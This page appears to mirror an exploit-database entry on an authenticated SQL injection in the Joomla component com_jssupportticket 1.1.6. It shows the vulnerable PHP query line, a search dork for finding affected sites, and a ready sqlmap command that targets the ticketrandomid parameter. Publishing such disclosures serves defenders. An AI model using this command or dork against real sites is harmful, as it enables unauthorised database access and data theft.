header-logo
Suggest Exploit
vendor:
jssupportticket
by:
qw3rTyTy
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: jssupportticket
Affected Version From: 1.1.6
Affected Version To: 1.1.6
Patch Exists: NO
Related CWE: N/A
CPE: a:joomsky:jssupportticket:1.1.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian/nginx/joomla 3.9.0
2019

Joomla! component com_jssupportticket – Authenticated SQL Injection

A SQL injection vulnerability exists in the Joomla! component com_jssupportticket in the admin/models/ticketreply.php file. The vulnerable code is in line 31, where the ticketrandomid parameter is not properly sanitized before being used in a SQL query. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious ticketrandomid parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.
Source

Exploit-DB raw data:

#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 31 in file admin/models/ticketreply.php
	
	...snip...
    24	    function storeTicketReplies($ticketid, $message, $created, $data2) {
    25	        if (!is_numeric($ticketid))
    26	            return false;
    27	
    28	        //validate reply for break down
    29	        $ticketrandomid   = $data2['ticketrandomid'];		//!!!
    30	        $db = $this->getDBo();
    31	        $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'";	//!!!
    32	        $db->setQuery($query);
    33	        $res = $db->loadResult();
    34	        if($res != $ticketid){
    35	            return false;
    36	        }//end
    ...snip...

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'

Navigation

Suggest Exploit

Services By CQR